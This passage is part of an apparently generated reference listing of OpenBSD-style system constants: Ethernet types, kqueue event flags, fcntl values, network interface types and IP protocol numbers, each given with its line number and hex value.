0x7000 constant ETHERTYPE_UBNIU (line 481) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 482) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 483) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 484) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 485) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 486) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 487) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 488) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 489) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 490) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 491) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 492) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 493) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 494) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 495) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 496) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 497) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 498) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 499) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 500) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 501) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 502) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 503) | ETHER_ADDR_LEN = 0x6 constant ETHER_ALIGN (line 504) | ETHER_ALIGN = 0x2 constant ETHER_CRC_LEN (line 505) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 506) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 507) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 508) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_DIX_LEN (line 509) | ETHER_MAX_DIX_LEN = 0x600 constant ETHER_MAX_HARDMTU_LEN (line 510) | ETHER_MAX_HARDMTU_LEN = 0xff9b constant ETHER_MAX_LEN (line 511) | ETHER_MAX_LEN = 0x5ee constant ETHER_MIN_LEN (line 512) | ETHER_MIN_LEN = 0x40 constant ETHER_TYPE_LEN (line 513) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 514) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 515) | EVFILT_AIO = -0x3 constant EVFILT_DEVICE (line 516) | EVFILT_DEVICE = -0x8 constant EVFILT_EXCEPT (line 517) | EVFILT_EXCEPT = -0x9 constant EVFILT_PROC (line 518) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 519) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 520) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 521) | EVFILT_SYSCOUNT = 0x9 constant EVFILT_TIMER (line 522) | EVFILT_TIMER = -0x7 constant EVFILT_VNODE (line 523) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 524) | EVFILT_WRITE = -0x2 constant EVL_ENCAPLEN (line 525) | EVL_ENCAPLEN = 0x4 constant EVL_PRIO_BITS (line 526) | EVL_PRIO_BITS = 0xd constant EVL_PRIO_MAX (line 527) | EVL_PRIO_MAX = 0x7 constant EVL_VLID_MASK (line 528) | EVL_VLID_MASK = 0xfff constant EVL_VLID_MAX (line 529) | EVL_VLID_MAX = 0xffe constant EVL_VLID_MIN (line 530) | EVL_VLID_MIN = 0x1 constant EVL_VLID_NULL (line 531) | EVL_VLID_NULL = 0x0 constant EV_ADD (line 532) | EV_ADD = 0x1 constant EV_CLEAR (line 533) | EV_CLEAR = 0x20 constant EV_DELETE (line 534) | EV_DELETE = 0x2 constant EV_DISABLE (line 535) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 536) | EV_DISPATCH = 0x80 constant EV_ENABLE (line 537) | EV_ENABLE = 0x4 constant EV_EOF (line 538) | EV_EOF = 0x8000 constant EV_ERROR (line 539) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 540) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 541) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 542) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 543) | EV_SYSFLAGS = 0xf800 constant EXTA (line 544) | EXTA = 0x4b00 constant EXTB (line 545) | EXTB = 0x9600 constant EXTPROC (line 546) | EXTPROC = 0x800 constant FD_CLOEXEC (line 547) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 548) | FD_SETSIZE = 0x400 constant FLUSHO (line 549) | FLUSHO = 0x800000 constant F_DUPFD (line 550) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 551) | F_DUPFD_CLOEXEC = 0xa constant F_GETFD (line 552) | F_GETFD = 0x1 constant F_GETFL (line 553) | F_GETFL = 0x3 constant F_GETLK (line 554) | F_GETLK = 0x7 constant F_GETOWN (line 555) | F_GETOWN = 0x5 constant F_ISATTY (line 556) | F_ISATTY = 0xb constant F_OK (line 557) | F_OK = 0x0 constant F_RDLCK (line 558) | F_RDLCK = 0x1 constant F_SETFD (line 559) | F_SETFD = 0x2 constant F_SETFL (line 560) | F_SETFL = 0x4 constant F_SETLK (line 561) | F_SETLK = 0x8 constant F_SETLKW (line 562) | F_SETLKW = 0x9 constant F_SETOWN (line 563) | F_SETOWN = 0x6 constant F_UNLCK (line 564) | F_UNLCK = 0x2 constant F_WRLCK (line 565) | F_WRLCK = 0x3 constant HUPCL (line 566) | HUPCL = 0x4000 constant HW_MACHINE (line 567) | HW_MACHINE = 0x1 constant ICANON (line 568) | ICANON = 0x100 constant ICMP6_FILTER (line 569) | ICMP6_FILTER = 0x12 constant ICRNL (line 570) | ICRNL = 0x100 constant IEXTEN (line 571) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 572) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 573) | IFAN_DEPARTURE = 0x1 constant IFF_ALLMULTI (line 574) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 575) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 576) | IFF_CANTCHANGE = 0x8e52 constant IFF_DEBUG (line 577) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 578) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 579) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 580) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 581) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 582) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 583) | IFF_NOARP = 0x80 constant IFF_OACTIVE (line 584) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 585) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 586) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 587) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 588) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 589) | IFF_STATICARP = 0x20 constant IFF_UP (line 590) | IFF_UP = 0x1 constant IFNAMSIZ (line 591) | IFNAMSIZ = 0x10 constant IFT_1822 (line 592) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 593) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 594) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 595) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 596) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 597) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 598) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 599) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 600) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 601) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 602) | IFT_ASYNC = 0x54 constant IFT_ATM (line 603) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 604) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 605) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 606) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 607) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 608) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 609) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 610) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 611) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 612) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BLUETOOTH (line 613) | IFT_BLUETOOTH = 0xf8 constant IFT_BRIDGE (line 614) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 615) | IFT_BSC = 0x53 constant IFT_CARP (line 616) | IFT_CARP = 0xf7 constant IFT_CCTEMUL (line 617) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 618) | IFT_CEPT = 0x13 constant IFT_CES (line 619) | IFT_CES = 0x85 constant IFT_CHANNEL (line 620) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 621) | IFT_CNR = 0x55 constant IFT_COFFEE (line 622) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 623) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 624) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 625) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 626) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 627) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 628) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 629) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 630) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 631) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 632) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 633) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 634) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 635) | IFT_DS3 = 0x1e constant IFT_DTM (line 636) | IFT_DTM = 0x8c constant IFT_DUMMY (line 637) | IFT_DUMMY = 0xf1 constant IFT_DVBASILN (line 638) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 639) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 640) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 641) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 642) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 643) | IFT_ECONET = 0xce constant IFT_ENC (line 644) | IFT_ENC = 0xf4 constant IFT_EON (line 645) | IFT_EON = 0x19 constant IFT_EPLRS (line 646) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 647) | IFT_ESCON = 0x49 constant IFT_ETHER (line 648) | IFT_ETHER = 0x6 constant IFT_FAITH (line 649) | IFT_FAITH = 0xf3 constant IFT_FAST (line 650) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 651) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 652) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 653) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 654) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 655) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 656) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 657) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 658) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 659) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 660) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 661) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 662) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 663) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 664) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 665) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 666) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 667) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 668) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 669) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 670) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 671) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 672) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 673) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 674) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 675) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 676) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 677) | IFT_HSSI = 0x2e constant IFT_HY (line 678) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 679) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 680) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 681) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 682) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 683) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 684) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 685) | IFT_IFGSN = 0x91 constant IFT_IMT (line 686) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 687) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 688) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 689) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 690) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 691) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 692) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 693) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 694) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 695) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 696) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 697) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 698) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 699) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 700) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 701) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 702) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 703) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 704) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 705) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 706) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 707) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 708) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 709) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 710) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 711) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 712) | IFT_LAPB = 0x10 constant IFT_LAPD (line 713) | IFT_LAPD = 0x4d constant IFT_LAPF (line 714) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 715) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 716) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 717) | IFT_LOOP = 0x18 constant IFT_MBIM (line 718) | IFT_MBIM = 0xfa constant IFT_MEDIAMAILOVERIP (line 719) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 720) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 721) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 722) | IFT_MODEM = 0x30 constant IFT_MPC (line 723) | IFT_MPC = 0x71 constant IFT_MPLS (line 724) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 725) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 726) | IFT_MSDSL = 0x8f constant IFT_MVL (line 727) | IFT_MVL = 0xbf constant IFT_MYRINET (line 728) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 729) | IFT_NFAS = 0xaf constant IFT_NSIP (line 730) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 731) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 732) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 733) | IFT_OTHER = 0x1 constant IFT_P10 (line 734) | IFT_P10 = 0xc constant IFT_P80 (line 735) | IFT_P80 = 0xd constant IFT_PARA (line 736) | IFT_PARA = 0x22 constant IFT_PFLOG (line 737) | IFT_PFLOG = 0xf5 constant IFT_PFLOW (line 738) | IFT_PFLOW = 0xf9 constant IFT_PFSYNC (line 739) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 740) | IFT_PLC = 0xae constant IFT_PON155 (line 741) | IFT_PON155 = 0xcf constant IFT_PON622 (line 742) | IFT_PON622 = 0xd0 constant IFT_POS (line 743) | IFT_POS = 0xab constant IFT_PPP (line 744) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 745) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 746) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 747) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 748) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 749) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 750) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 751) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 752) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 753) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 754) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 755) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 756) | IFT_PVC = 0xf2 constant IFT_Q2931 (line 757) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 758) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 759) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 760) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 761) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 762) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 763) | IFT_RS232 = 0x21 constant IFT_RSRB (line 764) | IFT_RSRB = 0x4f constant IFT_SDLC (line 765) | IFT_SDLC = 0x11 constant IFT_SDSL (line 766) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 767) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 768) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 769) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 770) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 771) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 772) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 773) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 774) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 775) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 776) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 777) | IFT_SONETVT = 0x33 constant IFT_SRP (line 778) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 779) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 780) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 781) | IFT_STARLAN = 0xb constant IFT_T1 (line 782) | IFT_T1 = 0x12 constant IFT_TDLC (line 783) | IFT_TDLC = 0x74 constant IFT_TELINK (line 784) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 785) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 786) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 787) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 788) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 789) | IFT_ULTRA = 0x1d constant IFT_USB (line 790) | IFT_USB = 0xa0 constant IFT_V11 (line 791) | IFT_V11 = 0x40 constant IFT_V35 (line 792) | IFT_V35 = 0x2d constant IFT_V36 (line 793) | IFT_V36 = 0x41 constant IFT_V37 (line 794) | IFT_V37 = 0x78 constant IFT_VDSL (line 795) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 796) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 797) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 798) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 799) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 800) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 801) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 802) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 803) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 804) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 805) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 806) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 807) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 808) | IFT_VOICEOVERIP = 0x68 constant IFT_WIREGUARD (line 809) | IFT_WIREGUARD = 0xfb constant IFT_X213 (line 810) | IFT_X213 = 0x5d constant IFT_X25 (line 811) | IFT_X25 = 0x5 constant IFT_X25DDN (line 812) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 813) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 814) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 815) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 816) | IFT_XETHER = 0x1a constant IGNBRK (line 817) | IGNBRK = 0x1 constant IGNCR (line 818) | IGNCR = 0x80 constant IGNPAR (line 819) | IGNPAR = 0x4 constant IMAXBEL (line 820) | IMAXBEL = 0x2000 constant INLCR (line 821) | INLCR = 0x40 constant INPCK (line 822) | INPCK = 0x10 constant IN_CLASSA_HOST (line 823) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 824) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 825) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 826) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 827) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 828) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 829) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 830) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 831) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 832) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 833) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 834) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 835) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 836) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 837) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_HOST (line 838) | IN_RFC3021_HOST = 0x1 constant IN_RFC3021_NET (line 839) | IN_RFC3021_NET = 0xfffffffe constant IN_RFC3021_NSHIFT (line 840) | IN_RFC3021_NSHIFT = 0x1f constant IPPROTO_AH (line 841) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 842) | IPPROTO_CARP = 0x70 constant IPPROTO_DIVERT (line 843) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 844) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 845) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 846) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 847) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 848) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 849) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 850) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 851) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 852) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 853) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 854) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 855) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 856) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 857) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 858) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 859) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 860) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 861) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 862) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 863) | IPPROTO_IPV6 = 0x29 constant IPPROTO_MAX (line 864) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 865) | IPPROTO_MAXID = 0x103 constant IPPROTO_MOBILE (line 866) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 867) | IPPROTO_MPLS = 0x89 constant IPPROTO_NONE (line 868) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 869) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 870) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 871) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 872) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 873) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 874) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 875) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 876) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 877) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 878) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 879) | IPPROTO_UDPLITE = 0x88 constant IPV6_AUTH_LEVEL (line 880) | IPV6_AUTH_LEVEL = 0x35 constant IPV6_AUTOFLOWLABEL (line 881) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_CHECKSUM (line 882) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 883) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 884) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 885) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 886) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 887) | IPV6_DSTOPTS = 0x32 constant IPV6_ESP_NETWORK_LEVEL (line 888) | IPV6_ESP_NETWORK_LEVEL = 0x37 constant IPV6_ESP_TRANS_LEVEL (line 889) | IPV6_ESP_TRANS_LEVEL = 0x36 constant IPV6_FAITH (line 890) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 891) | IPV6_FLOWINFO_MASK = 0xfffffff constant IPV6_FLOWLABEL_MASK (line 892) | IPV6_FLOWLABEL_MASK = 0xfffff constant IPV6_FRAGTTL (line 893) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 894) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 895) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 896) | IPV6_HOPOPTS = 0x31 constant IPV6_IPCOMP_LEVEL (line 897) | IPV6_IPCOMP_LEVEL = 0x3c constant 